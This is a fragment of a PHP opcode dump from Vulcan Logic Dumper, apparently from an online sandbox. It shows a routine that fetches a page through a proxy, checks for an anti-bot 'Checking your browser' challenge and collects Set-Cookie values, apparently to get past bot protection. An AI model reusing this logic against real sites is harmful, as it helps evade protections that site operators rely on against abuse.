         29        SEND_VAR_EX                                              !7
         30        FETCH_CONSTANT                                   ~25     'CURLOPT_RETURNTRANSFER'
         31        SEND_VAL_EX                                              ~25
         32        SEND_VAL_EX                                              <true>
         33        DO_FCALL                                      0          
  253    34        INIT_FCALL_BY_NAME                                       'curl_setopt'
         35        SEND_VAR_EX                                              !7
         36        FETCH_CONSTANT                                   ~27     'CURLOPT_HEADER'
         37        SEND_VAL_EX                                              ~27
         38        SEND_VAL_EX                                              1
         39        DO_FCALL                                      0          
  254    40        INIT_FCALL_BY_NAME                                       'curl_setopt'
         41        SEND_VAR_EX                                              !7
         42        FETCH_CONSTANT                                   ~29     'CURLOPT_TIMEOUT'
         43        SEND_VAL_EX                                              ~29
         44        SEND_VAR_EX                                              !4
         45        DO_FCALL                                      0          
  255    46        INIT_FCALL_BY_NAME                                       'curl_setopt'
         47        SEND_VAR_EX                                              !7
         48        FETCH_CONSTANT                                   ~31     'CURLOPT_PROXY'
         49        SEND_VAL_EX                                              ~31
         50        SEND_VAR_EX                                              !2
         51        DO_FCALL                                      0          
  256    52        INIT_FCALL_BY_NAME                                       'curl_exec'
         53        SEND_VAR_EX                                              !7
         54        DO_FCALL                                      0  $33     
         55        ASSIGN                                                   !8, $33
  257    56        INIT_FCALL                                               'strpos'
         57        SEND_VAR                                                 !8
         58        SEND_VAL                                                 'Checking+your+browser+before+accessing'
         59        DO_ICALL                                         $35     
         60        TYPE_CHECK                                    4  ~36     $35
         61      > JMPZ_EX                                          ~36     ~36, ->64
         62    >   TYPE_CHECK                                  1018  ~37     !8
         63        BOOL                                             ~36     ~37
         64    > > JMPZ                                                     ~36, ->90
  258    65    >   IS_NOT_EQUAL                                             !2, null
         66      > JMPZ                                                     ~38, ->70
  259    67    >   NOP                                                      
         68        FAST_CONCAT                                      ~39     '+%7C+PROXY%3A+', !2
         69        ASSIGN                                                   !9, ~39
  261    70    >   INIT_FCALL                                               'var_dump'
         71        SEND_VAR                                                 !8
         72        DO_ICALL                                                 
  262    73        INIT_METHOD_CALL                                         !5, 'getColoredString'
         74        CONCAT                                           ~42     'Initializing+Cookies+%23', !3
         75        CONCAT                                           ~43     ~42, !9
         76        CONCAT                                           ~44     ~43, '%0A'
         77        SEND_VAL_EX                                              ~44
         78        SEND_VAL_EX                                              'light_red'
         79        SEND_VAL_EX                                              null
         80        DO_FCALL                                      0  $45     
         81        CONCAT                                           ~46     $45, '%0A'
         82        ECHO                                                     ~46
  263    83        INIT_FCALL                                               'preg_match_all'
         84        SEND_VAL                                                 '%2F%5ESet-Cookie%3A%5Cs%2A%28%5B%5E%3B%5D%2A%29%2Fmi'
         85        SEND_VAR                                                 !8
         86        SEND_REF                                                 !10
         87        DO_ICALL                                                 
  264    88        ASSIGN                                                   !11, <array>
  265    89      > RETURN                                                   !11
  268    90    >   NEW                                     

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
18.49 ms | 500 KiB | 7 Q